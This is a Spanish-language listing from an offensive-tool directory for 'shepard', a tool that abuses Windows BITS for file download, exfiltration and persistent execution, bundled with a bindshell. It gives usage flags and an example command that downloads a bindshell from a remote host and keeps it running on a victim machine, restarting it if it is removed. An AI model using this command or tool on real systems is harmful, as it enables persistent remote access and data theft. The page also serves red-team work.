Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
shepard — Herramienta persistente de descarga/carga/ejecución en progreso que utiliza Windows BITS. | Kitploit
Herramientas/GitHubGitHub/d3adzo/shepard
Mecanismos de PersistenciaExfiltración de DatosPost-ExplotaciónComando y ControlRed TeamingHerramienta de Acceso Remoto
GitHubd3adzo/shepard

shepard

Herramienta persistente de descarga/carga/ejecución en progreso que utiliza Windows BITS.

Ver Repositorio
413hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

SHEPARD

BITS

Esta es una herramienta de persistencia que utiliza el Servicio de Transferencia Inteligente en Segundo Plano de Windows (BITS).

Funcionalidad

Descarga de archivos, Exfiltración de archivos, Descarga de archivos + Ejecución persistente

Uso

Ejecute shepard.exe como Administrador con los siguientes argumentos de línea de comandos:

-d <remoteLocation> <writePath> : descarga normal de archivos a una ruta local de su elección

-e <remoteLocation> <localPath> : carga normal de archivos desde una ruta local de su elección (solo envía al servidor IIS, esto es una limitación de BITS)

-dr <remoteLocation> <writePath> [optionalFileArgs] : descarga de archivos a una ruta de su elección, e intentará mantener la persistencia. El archivo descargado intentará ejecutarse con optionalFileArgs y BITS verificará cada 30 segundos para asegurarse de que el archivo siga ejecutándose en el sistema comprometido.

Ejecutar este ejecutable sin argumentos o con una cantidad incorrecta de argumentos hará que shepard termine limpiamente.

BINDSHELL

El servidor (víctima) está escrito en C#. Escucha en el puerto 6006.

Uso de la víctima

Ejecute shepardsbind_serv.exe sin argumentos.

El cliente (atacante) está escrito en Python y toma un argumento: la dirección IP de la máquina de la víctima.

Uso del servidor

shepardsbind_recv.py <victim's IP>

Ejecutar shepardsbind_recv.py sin argumentos devolverá un error.

Usándolos en conjunto

El único ejecutable que debe estar en la máquina de la víctima es shepard.exe. Aloje el ejecutable descargable de bindshell en un lugar accesible públicamente. Shepard descargará y ejecutará el ejecutable de bindshell, y el usuario ahora puede usar el receptor de Python. Si el shell es encontrado y eliminado, se reiniciará después de 30 segundos.

Ejemplo: shepard.exe -dr http://location.com/shepardsbind_serv.exe C:\Users\Administrator\file.exe

Descargar herramienta